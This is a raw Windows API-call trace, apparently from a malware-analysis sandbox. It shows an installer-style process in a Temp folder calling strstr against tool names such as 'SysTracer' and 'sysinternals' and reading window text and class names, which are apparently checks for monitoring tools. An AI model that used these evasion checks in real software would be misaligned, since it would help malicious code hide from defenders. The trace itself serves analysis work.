lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.650] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.650] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.651] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.651] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.651] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.651] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.651] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.651] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.651] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.651] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") 
returned="strstr" [0158.651] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.651] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.652] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.652] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.652] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.652] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.652] lstrlenA (lpString="0") returned 1 [0158.652] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.652] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", 
iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.652] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.653] lstrlenA (lpString="0") returned 1 [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrlenA (lpString="") returned 0 [0158.653] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrlenA (lpString="3399936") returned 7 [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.653] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" 
[0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrlenA (lpString="") returned 0 [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.653] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrlenA (lpString="") returned 0 [0158.654] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrlenA (lpString="") returned 0 [0158.654] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.654] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.654] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.654] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.654] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.655] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.655] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.655] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.655] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.655] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.655] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.655] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.656] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: 
lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrlenA (lpString="0") returned 1 [0158.656] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.656] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.656] lstrlenA (lpString="0") returned 1 [0158.656] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.656] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.656] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.656] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.656] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.657] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.657] lstrlenA (lpString="3399936") returned 7 [0158.657] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.657] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.657] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.657] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 
returned="Call" [0158.657] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.657] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.657] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.657] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.657] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.658] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.658] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65660") returned 5 [0158.658] lstrcpyA (in: lpString1=0x430400, lpString2="65660" | out: lpString1="65660") returned="65660" [0158.658] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrlenA (lpString="callback1") returned 9 [0158.658] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.658] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.658] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.658] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.659] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.659] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.659] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.659] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.659] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.659] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.659] lstrcpynA (in: lpString1=0x341200, lpString2="65660", iMaxLength=1024 | out: lpString1="65660") returned="65660" [0158.659] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] GetWindowTextA (in: hWnd=0x1007c, lpString=0x340df8, nMaxCount=1024 | out: lpString="Start") returned 5 [0158.659] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.659] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.660] lstrcpyA (in: lpString1=0x430800, lpString2="Start" | out: lpString1="Start") returned="Start" [0158.660] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65660") returned 5 [0158.660] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.660] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.660] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.660] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.660] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.661] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.661] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.661] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.661] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.661] lstrcpynA (in: lpString1=0x340df8, lpString2="65660", iMaxLength=1024 | out: lpString1="65660") returned="65660" [0158.661] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Button") returned 6 [0158.661] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.661] lstrcpynA (in: lpString1=0x341200, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrcpyA (in: lpString1=0x430c00, lpString2="Button" | out: 
